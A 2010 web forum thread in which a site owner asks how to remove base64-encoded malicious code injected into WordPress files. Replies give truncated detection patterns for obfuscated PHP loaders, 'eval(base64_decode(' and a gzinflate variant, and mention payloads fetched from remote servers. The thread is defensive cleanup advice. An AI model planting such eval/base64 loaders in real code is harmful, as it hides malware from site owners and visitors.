homepage Welcome to WebmasterWorld Guest from 54.167.207.16
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Visit PubCon.com
Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
Forum Library, Charter, Moderators: phranque

Website Technology Issues Forum

    
Removing malicious lines of base 64 code
Malware in files, what to do, how to remove?
skibum




msg:4209470
 5:58 pm on Sep 30, 2010 (gmt 0)

So in a hosting account with a few Wordpress installations, there are several files that have been injected with malicious code. The web host says I will need to remove the malicious lines of base 64 code and secure the account against future attacks. There is a list of probably at least 200 files. Many are in the wp-admin, wp-includes, wp-content/themes and a few others I created trying to learn php/mysql and understand all this stuff better.

Any suggestions on what to do or how to remedy this? This all might as well be written in Chinese as I have no idea what to do. I looked at a few of the files I created and nothing jumps out at me as being out of place so can't see any "malicious lines of base 64 code".

 

lammert




msg:4209700
 2:57 am on Oct 1, 2010 (gmt 0)

These lines shouldn't be too difficult to recognize. They all start with something like

eval(base64_decode('some string...

The more sophisticated versions use zip compression:

eval(stripslashes(gzinflate(base64_decode('some string ...

I had them a few months ago in a WordPress installation of a non-profit organization I host for. The lines were there right from the beginning--even before the site went live--and I therefore don't think they were injected, but part of a free theme they found somewhere. I didn't analyze it fully, but it seemed that part of the functionality of the theme was coming from an external server and that server delivered the malicious payload. The download code from that remote server was base64 encoded, to make it difficult to identify for the average website builder.

Rather than cleaning up the mess, I just disabled the use of WordPress, removed all files and pushed the user in the direction of another CMS.

phranque




msg:4211430
 7:24 am on Oct 5, 2010 (gmt 0)

you have to figure out where the vulnerability is to ultimately solve the problem.
for example, it could be that someone obtained your login credentials, or that another account on the shared server provided a back door, or that you installed a theme containing some "bad stuff", or that WP or a plugin has a vulnerability.

here are a few WebmasterWorld posts that may provide some clues.

Website HACKED - help!:
http://www.webmasterworld.com/webmaster/4042154.htm [webmasterworld.com]

I have a site hijacking my wordpress - can you help?:
http://www.webmasterworld.com/content_management/3830507.htm [webmasterworld.com]

30 day ban for cloaked outgoing links due to PHP hack:
http://www.webmasterworld.com/google/3823009.htm [webmasterworld.com]

skibum




msg:4211443
 7:44 am on Oct 5, 2010 (gmt 0)

Thanks! Was looking at the files noted by the host as having Base 64 code in them and could not find any strange code in a handful that were supposedly infected. Doubt I'll ever be able to figure out where the backdoor is if changing login credentials doesn't work but those threads add a few more things to run through to try to clean things up.

phranque




msg:4211515
 9:32 am on Oct 5, 2010 (gmt 0)

as was mentioned in one thread the payload could be dynamically included from an external server.
also note that the database may contain the encoded javascript and the php script is assembling that content on the fly.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved